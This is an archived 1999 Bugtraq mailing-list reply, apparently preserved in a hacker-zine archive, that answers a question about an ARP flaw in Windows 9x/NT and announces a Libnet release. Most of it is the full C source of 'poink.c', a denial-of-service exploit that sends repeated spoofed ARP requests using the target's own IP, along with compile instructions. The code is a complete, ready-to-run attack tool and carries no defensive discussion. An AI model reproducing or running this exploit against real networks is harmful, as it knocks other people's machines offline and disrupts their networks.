home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Happle / happle10.sit.hqx / Happle#10 / Files / Denial.sit / DoS / poink.c < prev    next >
Internet Message Format  |  1999-04-16  |  6KB
  1. Date: Tue, 13 Apr 1999 11:25:34 -0700
  2. From: route@RESENTMENT.INFONEXUS.COM
  3. To: BUGTRAQ@netspace.org
  4. Subject: Re: ARP problem in Windows9X/NT
  5.  
  6. [kay wrote]
  7. |
  8. | Could you be more specific with those XX-fields ?
  9.  
  10.     The source ethernet address appears to be arbitrary.  The destination
  11.     ethernet address needs to be either the address of the target host, or
  12.     a broadcast address.
  13.  
  14. | I started writing that proggie with plain syscalls, but it would only run
  15. | on Linux, so I modified one of the examples in Route's Libnet 0.9 to do
  16. | the stuff. I haven't tested it yes since I don't have LAN at home...
  17.  
  18.     Didn't test your code.  Rolled my from the same libnet example, and it
  19.     does work against NT and 95/98.
  20.  
  21. | For those who are still wondering what the hell Libnet is: check out
  22. | http://www.infonexus.com/~demon9
  23.  
  24.     My site has moved temporarily to http://lazy.accessus.net/~route.
  25.     Libnet is hosted there for the time being
  26.     (http://lazy.accessus.net/~route/Libnet) but will move to
  27.     http://www.packetfactory.net when I get that site up.
  28.  
  29.     For those of you who don't know, Libnet is a library for portable
  30.     injection.  It is the `libpwrite` analog to libpcap.  I suppose this is
  31.     as good a time as any to announce the release of version 0.99 which adds
  32.     a lot of new functionality and fixes a few bugs.
  33.  
  34.     Oh yah.  Here's poink.  Poink-poink!
  35.  
  36. /*
  37.  *  $Id$
  38.  *
  39.  *  poink.c - NT/9x DOS attack
  40.  *
  41.  *  Code:
  42.  *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
  43.  *                         route|daemon9 <route@infonexus.com>
  44.  *  All rights reserved.
  45.  *
  46.  *  Original Idea:
  47.  *  Joel Jacobson (joel@mobila.cx)
  48.  *
  49.  *  This simple exploit was written as per the specification from Joel
  50.  *  Jacobson's bugtraq post (http://geek-girl.com/bugtraq/1999_1/1299.html).
  51.  *
  52.  *  Needs libnet 0.99.
  53.  *  Currently:  http://lazy.accessus.net/~route/libnet
  54.  *  Soon:       http://www.packetfactory.net/
  55.  *
  56.  *  gcc poink.c -o poink -lnet
  57.  *
  58.  * Redistribution and use in source and binary forms, with or without
  59.  * modification, are permitted provided that the following conditions
  60.  * are met:
  61.  * 1. Redistributions of source code must retain the above copyright
  62.  *    notice, this list of conditions and the following disclaimer.
  63.  * 2. Redistributions in binary form must reproduce the above copyright
  64.  *    notice, this list of conditions and the following disclaimer in the
  65.  *    documentation and/or other materials provided with the distribution.
  66.  *
  67.  * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
  68.  * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  69.  * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
  70.  * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
  71.  * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  72.  * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
  73.  * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
  74.  * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
  75.  * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
  76.  * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
  77.  * SUCH DAMAGE.
  78.  *
  79.  */
  80.  
  81. #include <libnet.h>
  82.  
  83. u_char enet_src[6] = {0x00, 0x0d, 0x0e, 0x0a, 0x0d, 0x00};
  84. u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
  85.  
  86. int send_arp(struct link_int *, u_long, u_char *);
  87. void usage(u_char *);
  88.  
  89. int
  90. main(int argc, char *argv[])
  91. {
  92.     int c, amount;
  93.     char errbuf[256];
  94.     char *device = NULL;
  95.     struct link_int *l;
  96.     u_long ip;
  97.  
  98.     amount = 20;
  99.     while ((c = getopt(argc, argv, "n:i:")) != EOF)
  100.     {
  101.         switch (c)
  102.         {
  103.             case 'i':
  104.                 device = optarg;
  105.                 break;
  106.             case 'n':
  107.                 amount = atoi(optarg);
  108.                 break;
  109.             default:
  110.                 exit(EXIT_FAILURE);
  111.         }
  112.     }
  113.  
  114.     if (!device)
  115.     {
  116.         usage(argv[0]);
  117.         exit(EXIT_FAILURE);
  118.     }
  119.  
  120.     if (argc <= optind)
  121.     {
  122.         usage(argv[0]);
  123.         exit(EXIT_FAILURE);
  124.     }
  125.     else if ((ip = libnet_name_resolve(argv[optind], 1)) == -1)
  126.     {
  127.         fprintf(stderr, "Cannot resolve IP address\n");
  128.         exit(EXIT_FAILURE);
  129.     }
  130.  
  131.     l = libnet_open_link_interface(device, errbuf);
  132.     if (!l)
  133.     {
  134.         fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf);
  135.         exit(EXIT_FAILURE);
  136.     }
  137.  
  138.     while (amount--)
  139.     {
  140.         c = send_arp(l, ip, device);
  141.         if (c == -1)
  142.         {
  143.             /* bail on the first error */
  144.             break;
  145.         }
  146.     }
  147.     printf("\n");
  148.     return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
  149. }
  150.  
  151.  
  152. int
  153. send_arp(struct link_int *l, u_long ip, u_char *device)
  154. {
  155.     int n;
  156.     u_char *buf;
  157.  
  158.     if (libnet_init_packet(ARP_H + ETH_H, &buf) == -1)
  159.     {
  160.         perror("libnet_init_packet memory:");
  161.         exit(EXIT_FAILURE);
  162.     }
  163.  
  164.     /*
  165.      *  Ethernet header
  166.      */
  167.     libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf);
  168.  
  169.     /*
  170.      *  ARP header
  171.      */
  172.     libnet_build_arp(ARPHRD_ETHER,
  173.         ETHERTYPE_IP,
  174.         6,
  175.         4,
  176.         ARPOP_REQUEST,
  177.         enet_src,
  178.         (u_char *)&ip,
  179.         enet_dst,
  180.         (u_char *)&ip,
  181.         NULL,
  182.         0,
  183.         buf + ETH_H);
  184.  
  185.     n = libnet_write_link_layer(l, device, buf, ARP_H + ETH_H);
  186.  
  187.     fprintf(stderr, ".");
  188.  
  189.     libnet_destroy_packet(&buf);
  190.     return (n);
  191. }
  192.  
  193.  
  194. void
  195. usage(u_char *name)
  196. {
  197.     fprintf(stderr, "%s -i interface [-n amount] ip\n", name);
  198. }
  199.  
  200.  
  201. --
  202. I live a world of paradox... My willingness to destroy is your chance for
  203. improvement, my hate is your faith -- my failure is your victory, a victory
  204. that won't last.
  205.  
  206.